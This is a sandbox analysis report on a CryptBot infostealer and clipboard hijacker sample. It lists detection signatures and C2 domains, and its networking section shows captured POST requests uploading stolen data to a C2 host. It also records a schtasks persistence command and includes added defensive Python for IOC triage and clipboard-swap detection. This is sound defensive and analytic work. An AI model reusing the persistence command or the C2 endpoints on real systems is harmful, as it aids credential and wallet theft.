Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1523427
MD5: bb85c40120dac356bfc311f4774d3439
SHA1: bdcc094a88aa8971753da0c86e05c68578e5ce84
SHA256: cff579e5facdd493e0b023979049f4504ffc611c352a7d97928943e61c66dd0d
Tags: ClipboardHijacker, exe, user-aachum

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of taking screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: Set-up.exe.7652.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["elevenvx11pn.top", "~elevenvx11pn.top", "analforeverlovyu.top", "zx11pn.top", "|Xl@elevenvx11pn.top"]}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006615B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_006615B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_6C9414B0
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 5_2_006681E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BAC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C9E2EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C95AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6CA1F960h 5_2_6C95E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C96E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C96E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C9604F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 5_2_6C9E04E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C960610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C96A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C960010
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6CA1D014h] 5_2_6CA14110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C96C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C964203
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C9E8250
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C96A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BBDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 5_2_6C999F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BBF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C97B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C97B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C999910
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C9F9900
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BBAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C9B7AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 5_2_6C96D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6CA1DFF4h 5_2_6C9B3440
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 5_2_6C96D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C9B35F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 5_2_6C96D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C96D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C9D7100
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BB280
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C96D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_6C9B93B0

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49706 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49709 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49708 -> 185.244.181.140:80
Source: Malware configuration extractor URLs: elevenvx11pn.top
Source: Malware configuration extractor URLs: ~elevenvx11pn.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: zx11pn.top
Source: Malware configuration extractor URLs: |Xl@elevenvx11pn.top
Source: Joe Sandbox View IP Address: 185.244.181.140
Source: Joe Sandbox View ASN Name: BELCLOUDBG
Source: global traffic HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary71095901
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 413
  Host: elevenvx11pn.top
Source: global traffic HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary18234966
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 90016
  Host: elevenvx11pn.top
Source: global traffic HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary50062139
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 34443
  Host: elevenvx11pn.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: elevenvx11pn.top
Source: unknown HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary71095901
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 413
  Host: elevenvx11pn.top
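The POST requests above and the extractor's C2 list in the AV Detection section are the network indicators worth operationalising. The following Python is an added example written for this page, not code from Joe Sandbox, Emerging Threats or the sample: it re-splits a flattened request line of the kind the export produces, checks the traits visible in this report (POST to /v1/upload.php, a Chrome user agent, a "----Boundary<digits>" value, which is what the "boundary=----Boundary%lu" format string in the sample's memory strings further down produces), and drops the two extractor entries that cannot be host names. The matching rules and the host name regex are the author's assumptions, not the body of ET rule 2054350.

```python
"""Network IOC triage for the CryptBot artifacts in this report.

Added example for this page; not code from Joe Sandbox, Emerging Threats
or the sample. FLATTENED_REQUEST is the report's first POST line retyped
by hand (the export lost the CRLFs); RAW_C2_LIST is the extractor output
quoted in the AV Detection section. Matching rules are assumptions.
"""
import re

# Header names present in the report's POST lines. Splitting right before
# each of them is enough to recover the individual header lines.
KNOWN_HEADERS = ("Cache-Control", "Connection", "Pragma", "Content-Type",
                 "User-Agent", "Content-Length", "Host")
_SPLIT_RE = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, KNOWN_HEADERS)))

# Constructed from the report (newlines removed by extraction).
FLATTENED_REQUEST = (
    "POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-Alive"
    "Pragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary71095901"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413"
    "Host: elevenvx11pn.top"
)

# Extractor output, including the two entries with junk prefix bytes.
RAW_C2_LIST = ["elevenvx11pn.top", "~elevenvx11pn.top", "analforeverlovyu.top",
               "zx11pn.top", "|Xl@elevenvx11pn.top"]


def split_flattened_request(blob):
    """Recover (request_line, headers) from a run-together request.

    Only the header names in KNOWN_HEADERS are recognised; anything else
    stays glued to the preceding value, so check the result by eye.
    """
    parts = [p for p in _SPLIT_RE.split(blob) if p]
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value.strip()
    return parts[0].strip(), headers


# The sample formats the boundary with "----Boundary%lu" (see its memory
# strings), so the value is always "----Boundary" followed by decimal digits.
_BOUNDARY_RE = re.compile(r"^multipart/form-data; boundary=----Boundary\d{1,10}$")


def looks_like_cryptbot_upload(request_line, headers):
    """Heuristic mirror of the traits visible in the report's traffic.

    Assumption: this is the author's reading of the report, not the text
    of ET rule 2054350. Tune before using it for blocking.
    """
    method, _, rest = request_line.partition(" ")
    path = rest.split(" ", 1)[0]
    return (method == "POST"
            and path.endswith("/upload.php")
            and _BOUNDARY_RE.match(headers.get("Content-Type", "")) is not None
            and "Chrome/" in headers.get("User-Agent", "")
            and headers.get("Connection", "").lower() == "keep-alive")


# RFC 1123 host name shape (lower-case, dotted labels, alphabetic TLD).
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def normalize_c2_list(raw_entries):
    """Return (hosts, rejected): valid, de-duplicated host names in order
    of first appearance, and the entries that cannot be host names (the
    '~' and '|Xl@' prefixes are not part of any FQDN; most likely residue
    from the extractor's string decoding).
    """
    hosts, rejected = [], []
    for entry in raw_entries:
        host = entry.strip().lower()
        if _HOSTNAME_RE.match(host):
            if host not in hosts:
                hosts.append(host)
        else:
            rejected.append(entry)
    return hosts, rejected


if __name__ == "__main__":
    line, hdrs = split_flattened_request(FLATTENED_REQUEST)
    verdict = "CryptBot upload" if looks_like_cryptbot_upload(line, hdrs) else "no match"
    print(line, "->", verdict)
    print(normalize_c2_list(RAW_C2_LIST))
```

The three valid hosts are what belongs on a blocklist; the two rejected entries should be kept in the case notes but not pushed to DNS or proxy controls, where they would never match.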
Source: Set-up.exe, 00000000.00000003.1484449204.00000000007DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://elevenvx11pn.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NrIpUDVFuuHZveDEtrIh.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C959B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 5_2_6C959B99
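The function at 5_2_6C959B99 is the clipboard hijacker's read path: OpenClipboard, GetClipboardData and GlobalLock to read the text, and GetClipboardSequenceNumber, presumably so the loop can tell cheaply whether the clipboard changed since the last poll. The report does not show the replacement logic or which coin formats are targeted, so the following Python is an added example written for this page rather than code from the sample: it is the harness a sandbox operator would use to confirm the hijack, classifying a string by wallet-address shape (format only, no checksum validation) and reporting a swap when the text read back differs from what was placed on the clipboard but has the same address shape. The sample addresses are constructed strings of the right shape, not real wallets, and the address patterns are the author's.

```python
"""Clipboard swap detector for confirming a wallet hijacker in a sandbox.

Added example for this page; not code from Joe Sandbox or the sample.
Address patterns cover the shape only (no checksum), and the test
addresses below are constructed strings, not real wallets. On the
analysis VM, pair detect_swap() with a real clipboard read loop (for
example ctypes calls to the same user32 APIs the sample uses).
"""
import re

# Shape-only patterns; assumption: enough to tell the families apart.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text):
    """Return the address family name for text, or None if it is not one."""
    text = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return family
    return None


def detect_swap(placed, read_back):
    """Compare what was put on the clipboard with what is read back later.

    Returns (verdict, family):
      ("unchanged", family) when the text is identical,
      ("swapped", family)   when both are addresses of the same family but
                            differ (hijacker signature: shape kept, value replaced),
      ("changed", None)     for any other difference (user copied something else).
    """
    placed, read_back = placed.strip(), read_back.strip()
    if placed == read_back:
        return "unchanged", classify_address(placed)
    before, after = classify_address(placed), classify_address(read_back)
    if before is not None and before == after:
        return "swapped", before
    return "changed", None


def poll_for_swap(placed, reads):
    """Walk a sequence of clipboard reads and return the index of the first
    swap, or None.

    reads is an iterable of (sequence_number, text) pairs, mirroring
    GetClipboardSequenceNumber: a read is only examined when the number
    changed, so a hijacker that writes the clipboard must bump it.
    """
    last_seq = None
    for index, (seq, text) in enumerate(reads):
        if seq == last_seq:
            continue
        last_seq = seq
        if detect_swap(placed, text)[0] == "swapped":
            return index
    return None


# Constructed, shape-valid strings (not real wallets).
ETH_PLACED = "0x" + "ab" * 20
ETH_ATTACKER = "0x" + "cd" * 20
BTC_PLACED = "1A2b3C4d5E6f7G8h9J1K2L3M4N5P6Q7R8S"
BTC_ATTACKER = "1Z9y8X7w6V5u4T3s2R1q9P8n7M6k5J4h3G"

if __name__ == "__main__":
    print(detect_swap(ETH_PLACED, ETH_ATTACKER))
    print(poll_for_swap(BTC_PLACED, [(10, BTC_PLACED), (10, BTC_PLACED), (11, BTC_ATTACKER)]))
```

Run the harness with the sample live in the VM: place a constructed address on the clipboard, let the sample's sleep loop elapse (the report shows it sleeping in 100 ms steps), read the clipboard back and feed both strings to detect_swap(). A "swapped" verdict with the family unchanged is the confirmation; a "changed" verdict usually means the address shape is not one the sample targets.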

System Summary

Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr (314617856 bytes)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006651B0 5_2_006651B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00663E20 5_2_00663E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C94CD00 5_2_6C94CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6CA04E80 5_2_6CA04E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C94EE50 5_2_6C94EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C950FC0 5_2_6C950FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C990870 5_2_6C990870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C982A7E 5_2_6C982A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C984490 5_2_6C984490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9544F0 5_2_6C9544F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C980580 5_2_6C980580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C978570 5_2_6C978570
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C972110 5_2_6C972110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98FE10 5_2_6C98FE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C981E40 5_2_6C981E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C955880 5_2_6C955880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98D99E 5_2_6C98D99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C99DA20 5_2_6C99DA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C96F510 5_2_6C96F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9796A0 5_2_6C9796A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9877D0 5_2_6C9877D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9570C0 5_2_6C9570C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C943000 5_2_6C943000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9811BE 5_2_6C9811BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9912C0 5_2_6C9912C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98F3C0 5_2_6C98F3C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA13490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA0AB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA15980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA15A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA138D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA13310 appears 42 times
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\YEWtNFaySe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\CuDNObfgqmczoBnKhtUp
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Set-up.exe, 00000000.00000003.1526107515.000000000332D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
